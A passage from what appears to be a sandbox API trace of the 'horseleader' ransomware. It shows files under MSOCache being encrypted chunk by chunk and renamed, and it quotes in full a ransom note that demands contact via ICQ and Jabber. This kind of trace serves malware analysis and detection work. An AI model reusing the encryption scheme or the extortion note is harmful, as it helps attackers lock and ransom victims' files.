[0150.713] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff9b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.713] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x648, lpOverlapped=0x0) returned 1 [0150.714] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.714] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0150.714] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0150.714] CloseHandle (hObject=0x21c) returned 1 [0150.719] GetProcessHeap () returned 0x780000 [0150.719] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0150.719] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0150.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0150.721] GetProcessHeap () returned 0x780000 [0150.721] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0150.721] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0150.721] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0150.723] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0150.723] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0150.724] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0150.724] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0150.726] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0150.726] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0150.726] CloseHandle (hObject=0x1cc) returned 1 [0150.727] GetProcessHeap () returned 0x780000 [0150.727] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0150.727] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0150.727] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0150.727] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C") returned 66 [0150.727] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0150.727] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0150.728] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0150.728] GetProcessHeap () returned 0x780000 [0150.728] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0150.728] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*") returned 68 [0150.728] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0150.737] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0150.737] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\.") returned 68 [0150.737] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0150.737] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0150.737] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0150.738] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0150.738] lstrlenW (lpString=".testttjffg") returned 11 [0150.738] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0150.738] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0150.738] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0150.738] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0150.739] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0150.739] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0150.739] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\..") returned 69 [0150.739] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0150.739] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0150.739] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0150.740] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0150.740] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0150.740] lstrlenW (lpString=".testttjffg") returned 11 [0150.740] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0150.740] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0150.740] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0150.740] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0150.740] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0150.740] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="Windows") returned -1 [0150.741] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0150.741] StrStrIW (lpFirst="OutlkLR.cab", lpSrch=".horseleader") returned 0x0 [0150.741] lstrcmpW (lpString1="OutlkLR.cab", lpString2="#Decrypt#.txt") returned 1 [0150.741] lstrcmpW (lpString1="OutlkLR.cab", lpString2="_uninstalling_.png") returned 1 [0150.741] lstrlenW (lpString=".testttjffg") returned 11 [0150.741] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".testttjffg") returned 0x0 [0150.741] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0150.741] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0150.741] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0150.742] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0150.742] StrStrW (lpFirst="OutlkLR.cab", lpSrch=".txt") returned 0x0 [0150.742] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=14819276) returned 1 [0150.742] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.742] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0150.747] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.747] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0150.747] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x70e7e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.748] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0150.857] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.857] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0152.914] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xe1cfcc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.914] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0153.541] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.541] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0153.541] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.542] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0153.542] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0153.543] CloseHandle (hObject=0x21c) returned 1 [0157.106] GetProcessHeap () returned 0x780000 [0157.106] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0157.107] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.horseleader") returned 90 [0157.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.horseleader")) returned 1 [0157.108] GetProcessHeap () returned 0x780000 [0157.108] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0157.109] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0157.109] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="Windows") returned -1 [0157.109] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0157.109] StrStrIW (lpFirst="OutlookMUI.msi", lpSrch=".horseleader") returned 0x0 [0157.109] lstrcmpW (lpString1="OutlookMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0157.109] lstrcmpW (lpString1="OutlookMUI.msi", lpString2="_uninstalling_.png") returned 1 [0157.109] lstrlenW (lpString=".testttjffg") returned 11 [0157.110] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", lpSrch=".testttjffg") returned 0x0 [0157.110] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0157.110] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0157.110] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0157.111] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0157.111] StrStrW (lpFirst="OutlookMUI.msi", lpSrch=".txt") returned 0x0 [0157.111] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2865664) returned 1 [0157.111] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.112] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0157.116] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.117] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0157.117] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x15b500, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.118] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0157.120] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.121] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0157.121] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2b6a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.121] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0157.124] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.124] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0157.125] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.125] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0157.125] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0157.125] CloseHandle (hObject=0x21c) returned 1 [0160.844] GetProcessHeap () returned 0x780000 [0160.844] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0160.844] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.horseleader") returned 93 [0160.844] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All 